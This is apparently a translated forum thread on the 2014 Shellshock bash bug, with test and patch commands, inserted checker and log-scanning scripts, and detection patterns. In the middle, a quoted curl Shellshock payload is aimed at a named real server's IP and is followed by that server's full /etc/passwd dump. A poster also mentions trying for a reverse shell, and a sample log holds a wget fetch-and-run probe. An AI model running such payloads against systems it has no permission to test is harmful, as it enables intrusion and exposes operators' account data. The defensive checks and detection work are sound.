pufosul

Shellshock Bash bug


After Heartbleed, a new exploit is coming, apparently identified by the RedHat team. From what I understand it's a problem of badly written code. In short, with this exploit you can gain root access (a kind of admin) on a server running a version of unix/linux, so those with a Mac are affected too.

 

With most web servers running on Apache/nginx, and routers that run a version of linux (openwrt, dd-wrt), things look pretty bad.

 

I wonder whether Cisco and Juniper routers/switches are affected as well.


Memento Mori


It should be noted that this exploit can only be triggered on systems running services or applications that let unauthenticated users access/set environment variables remotely.
Examples of vulnerable systems:

  • Apache servers that use CGI scripts written in Bash
  • Certain DHCP clients
  • OpenSSH servers that use ForceCommand
  • Vulnerable networking services that use Bash

More details here: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 and http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169
 
What can we do in this case? How do we test the system for this vulnerability?
 
Type this command in the shell:
 

env VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"

 
The part echo Bash is vulnerable! is the big problem. This is where a potential attacker can inject malicious code. So if, after running the command above, the output gives you something like:
 

Bash is vulnerable!
Bash Test

You're fucked!
 
Just kidding! :) There is a patch (reportedly not yet finalized) that fixes the problem. So update bash:
 
APT-GET:
 


sudo apt-get update && sudo apt-get install --only-upgrade bash

 
YUM
 

sudo yum update bash

Regarding your question, pufosul, I think you need to ask Cisco. :)

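The post above gives the one-line check for CVE-2014-6271 and lists the Apache/CGI path as the main exposure. As an added example (not code from the post or from the linked advisories), the script below wraps the check for both CVEs in functions, and simulates what mod_cgi does with a request header: it exports it as HTTP_USER_AGENT before bash starts, so a header value beginning with `() {` was parsed as a function definition and anything after the closing brace ran. The CGI script and the User-Agent payload are constructed for this example; the second check uses the public test string for CVE-2014-7169, which on an affected bash turns `echo date` into a redirect and leaves a file named `echo` in the working directory.

```shell
#!/usr/bin/env bash
# Added example, not code from the post above. Checks the bash found in
# PATH for CVE-2014-6271 and CVE-2014-7169, and simulates the CGI path:
# a request header exported as HTTP_USER_AGENT before bash starts.

# Returns 0 if this bash still runs the code that follows an exported
# function definition (CVE-2014-6271), 1 if it is patched.
check_cve_2014_6271() {
    out=$(env x='() { :;}; echo VULNERABLE' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) return 0 ;;
        *)            return 1 ;;
    esac
}

# Returns 0 if only the first, incomplete fix is in place (CVE-2014-7169):
# the dangling parser state turns "echo date" into "date > echo", so a
# file named "echo" appears in the working directory. Returns 1 if patched.
check_cve_2014_7169() {
    dir=$(mktemp -d) || return 2
    ( cd "$dir" && env x='() { (a)=>\' bash -c 'echo date' >/dev/null 2>&1 )
    if [ -e "$dir/echo" ]; then rc=0; else rc=1; fi
    rm -rf "$dir"
    return $rc
}

# What mod_cgi does with a request header: it becomes HTTP_<NAME> in the
# CGI process environment. The bash CGI script below is constructed for
# this example. Prints the script's output; with a vulnerable bash the
# payload runs before the first line of the script is reached.
run_cgi_with_user_agent() {
    ua=$1
    script=$(mktemp) || return 2
    cat >"$script" <<'EOF'
echo "Content-Type: text/plain"
echo
echo "hello from cgi"
EOF
    env -i PATH="$PATH" HTTP_USER_AGENT="$ua" bash "$script" 2>/dev/null
    rc=$?
    rm -f "$script"
    return $rc
}

# Stand-alone run: report both checks, then show the CGI simulation.
main() {
    if check_cve_2014_6271; then echo "CVE-2014-6271: VULNERABLE"; else echo "CVE-2014-6271: not vulnerable"; fi
    if check_cve_2014_7169; then echo "CVE-2014-7169: VULNERABLE"; else echo "CVE-2014-7169: not vulnerable"; fi
    echo "--- CGI simulation, User-Agent: () { :;}; echo pwned ---"
    run_cgi_with_user_agent '() { :;}; echo pwned'
}

main
```

On a patched bash the CGI simulation prints only the three lines of the script; on an affected one the word `pwned` appears before `Content-Type`, which is exactly the header injection the curl test later in this thread relies on. Run the second check from a scratch directory, since it writes a file there on vulnerable systems.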

I tested on the servers at work. They have BASH 3.2, but it seems not to be affected. I tried to get a reverse shell :)

 

It seems the following Cisco devices are affected

 

 

  • Cisco VCS devices (x7 and x8)
  • Cisco MXE 3500
  • Cisco DMM and SNS (assuming since running Red Hat Enterprise but unable to verify)
  • Jabber Guest
  • TCS Endpoints (6 or below have been verified, unable to verify 7 but assume vulnerable)
  • Cisco Conductor

 

They have already released IPS signatures.

 

A test on a site that has not been patched yet.

curl -I "http://85.114.145.159/" -A '() { :;}; echo "BashSmash: " $(</etc/passwd)'

 

HTTP/1.1 301 Moved Permanently
Date: Thu, 25 Sep 2014 08:08:31 GMT
Server: Apache
BashBash: at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin: x:1:1:bin:/bin:/bin/bash
daemon: x:2:2:Daemon:/sbin:/bin/bash
ftp: x:40:49:FTP account:/srv/ftp:/bin/bash
games: x:12:100:Games account:/var/games:/bin/bash
haldaemon: x:104:107:User for haldaemon:/var/run/hald:/bin/false
lp: x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail: x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man: x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus: x:101:104:User for D-Bus:/var/run/dbus:/bin/false
news: x:9:13:News system:/etc/news:/bin/bash
nobody: x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp: x:74:102:NTP daemon:/var/lib/ntp:/bin/false
polkituser: x:103:106:PolicyKit:/var/run/PolicyKit:/bin/false
postfix: x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
root: x:0:0:root:/root:/bin/bash
suse-ncc: x:102:105:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp: x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
wwwrun: x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
norplex: x:1000:100:norplex:/home/norplex:/bin/bash
smmsp: x:1001:1000::/home/smmsp:/bin/bash
clamav: x:1002:1001:Clam AntiVirus:/home/clamav:/bin/false
mysql: x:1003:1002::/home/mysql:/bin/bash
httpd: x:1004:1003::/dev/local/httpd:/sbin/nologin
sshd: x:1005:1004:sshd privsep:/var/empty:/bin/false
nagios: x:1006:1005::/usr/local/nagios:/bin/bash
nolis: x:1008:100::/home/nolis:/bin/bash
neuzeit: x:1011:1008::/www/vhtdocs/neuzeit:/bin/false
sehnde: x:1012:1009::/www/vhtdocs/sehnde:/bin/false
burgwedel: x:1013:1010::/www/vhtdocs/burgwedel:/bin/false
regioncelle: x:1014:1011::/www/vhtdocs/regioncelle:/bin/false
gronau: x:1015:1012::/www/vhtdocs/gronau:/bin/false
osterode: x:1016:1013::/www/vhtdocs/osterode:/bin/false
ituelzen: x:1017:1014::/www/vhtdocs/ituelzen:/bin/false
celle: x:1018:1015::/www/vhtdocs/celle:/bin/false
buergertipps: x:1019:1016::/www/vhtdocs/buergertipps:/bin/false
obsburgwedel: x:1020:1017::/www/vhtdocs/obsburgwedel:/bin/false
schulausfall: x:1021:1018::/www/vhtdocs/schulausfall:/bin/false
cms: x:1022:1019::/www/vhtdocs/cms:/bin/false
hiller: x:1023:1020::/www/vhtdocs/hiller:/bin/false
signotec: x:1024:1021::/www/vhtdocs/signotec:/bin/false
hiab: x:1025:1022::/www/vhtdocs/hiab:/bin/false
kyffhaeusernds: x:1026:1023::/www/vhtdocs/kyffhaeusernds:/bin/false
jugendosterode: x:1027:1024::/www/vhtdocs/jugendosterode:/bin/false
saterland: x:1028:1025::/www/vhtdocs/saterland:/bin/false
bewerbung: x:1029:1026::/www/vhtdocs/bewerbung:/bin/false
cmsx: x:1030:1027::/www/vhtdocs/cmsx:/bin/false
lkwittmund: x:1031:1028::/www/vhtdocs/lkwittmund:/bin/false
nolisde: x:1032:1029::/www/vhtdocs/nolisde:/bin/false
grossenkn: x:1033:1030::/www/vhtdocs/grossenkn:/bin/false
bewerbungx: x:1034:1031::/www/vhtdocs/bewerbungx:/bin/false
bawn: x:1035:1032::/www/vhtdocs/bawn:/bin/false
emmebus: x:1036:1033::/www/vhtdocs/emmebus:/bin/false
emmebus01: x:1037:100::/home/emmebus01:/bin/false
emmebus02: x:1038:100::/home/emmebus02:/bin/false
bawnapp: x:1039:1034::/www/vhtdocs/bawnapp:/bin/false
hallewestfalen: x:1040:1035::/www/vhtdocs/hallewestfalen:/bin/false
barsbuettel: x:1041:1036::/www/vhtdocs/barsbuettel:/bin/false
pfotennavigator: x:1042:1037::/www/vhtdocs/pfotennavigator:/bin/false
dietomate: x:1043:1038::/www/vhtdocs/dietomate:/bin/false
ffosterode: x:1044:1039::/www/vhtdocs/ffosterode:/bin/false
ffosterode01: x:1045:100::/home/ffosterode01:/bin/false
goldschmiede: x:1046:1040::/www/vhtdocs/goldschmiede:/bin/false
loge: x:1047:1041::/www/vhtdocs/loge:/bin/false
kyffhaeusernds01: x:1048:100::/home/kyffhaeusernds01:/bin/false
wurzen: x:1049:1042::/www/vhtdocs/wurzen:/bin/false
rwgleese: x:1050:1043::/www/vhtdocs/rwgleese:/bin/false
rwgleese01: x:1051:100::/home/rwgleese01:/bin/false
rwgleese02: x:1052:100::/home/rwgleese02:/bin/false
rwgleese03: x:1053:100::/home/rwgleese03:/bin/false
rwgleese04: x:1054:100::/home/rwgleese04:/bin/false
rwgleese05: x:1055:100::/home/rwgleese05:/bin/false
rwgleese06: x:1056:100::/home/rwgleese06:/bin/false
rwgleese07: x:1057:100::/home/rwgleese07:/bin/false
rwgleese08: x:1058:100::/home/rwgleese08:/bin/false
rwgleese09: x:1059:100::/home/rwgleese09:/bin/false
rwgleese10: x:1060:100::/home/rwgleese10:/bin/false
brinkmann: x:1061:1044::/www/vhtdocs/brinkmann:/bin/false
brinkmann01: x:1062:100::/home/brinkmann01:/bin/false
brinkmann02: x:1063:100::/home/brinkmann02:/bin/false
tds: x:1064:1045::/www/vhtdocs/tds:/bin/falsei
Location: http://www.nolis.de
Content-Type: text/html

 

Taken from: http://0x4139.com/bashsmash-explained-what-does-the-vulnerability-mean-and-how-does-that-affect-you/

 

And a guy who scanned the Internet for problematic servers.

 

I never thought the day would come when Windows Server would be more stable than Linux :)


Memento Mori

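The IPS signatures mentioned in the post above look for the same thing a log search finds after the fact: the `() {` prefix bash used to recognise an exported function, arriving in a request header or, URL-encoded, in a query string. As an added example (not from the post), the shell script below scans combined-format access log lines for that prefix in either form and lists the source addresses. The log lines are constructed for this example, modelled on the curl test quoted above; the addresses are from documentation ranges, not real hosts.

```shell
#!/usr/bin/env bash
# Added example, not from the post above: search an access log for
# Shellshock probes and list their source addresses.

# Bash recognised an exported function by the prefix "() {" at the start
# of a variable's value. Probes send it in a header (User-Agent, Referer,
# Cookie ...) or, URL-encoded, in the query string: %28%29 is "()",
# %20 or "+" is a space, %7B is "{".
SHELLSHOCK_RE='\(\)[[:space:]]*\{|%28%29(%20|\+)*%7[bB]'

# Constructed sample in Apache/nginx combined log format. Lines 1, 3 and 4
# are probes (User-Agent, query string, Referer); line 2 is a normal request.
sample_log() {
    cat <<'EOF'
203.0.113.5 - - [25/Sep/2014:08:08:31 +0000] "GET / HTTP/1.1" 301 0 "-" "() { :;}; echo BashSmash: $(</etc/passwd)"
198.51.100.7 - - [25/Sep/2014:08:09:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Sep/2014:08:10:15 +0000] "GET /cgi-bin/test.cgi?x=%28%29%20%7B%20%3A%3B%7D%3B%20%2Fbin%2Fbash%20-i HTTP/1.1" 200 14 "-" "curl/7.30.0"
192.0.2.3 - - [25/Sep/2014:08:11:40 +0000] "GET /index.html HTTP/1.1" 200 2048 "() { :; }; /bin/bash -c 'wget http://198.51.100.77/x'" "Mozilla/5.0"
EOF
}

# Print the matching lines from stdin (or from the files given as arguments).
shellshock_hits() {
    grep -E "$SHELLSHOCK_RE" "$@" || true
}

# Print the number of matching lines.
count_shellshock_probes() {
    grep -Ec "$SHELLSHOCK_RE" "$@" || true
}

# Print each probing client address once. In combined format the client
# address is the first field.
shellshock_sources() {
    shellshock_hits "$@" | awk '{ print $1 }' | sort -u
}

# Stand-alone run over the constructed sample: the count, then the sources.
sample_log | count_shellshock_probes
sample_log | shellshock_sources
```

Against a real log, pass the file name: `count_shellshock_probes /var/log/apache2/access.log`. A hit only shows that a probe arrived, not that it succeeded; on a server that had a bash CGI, a 200 with an unusually small or large response to the probe, or outbound connections from the web server user around that timestamp, are the next things to look at.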
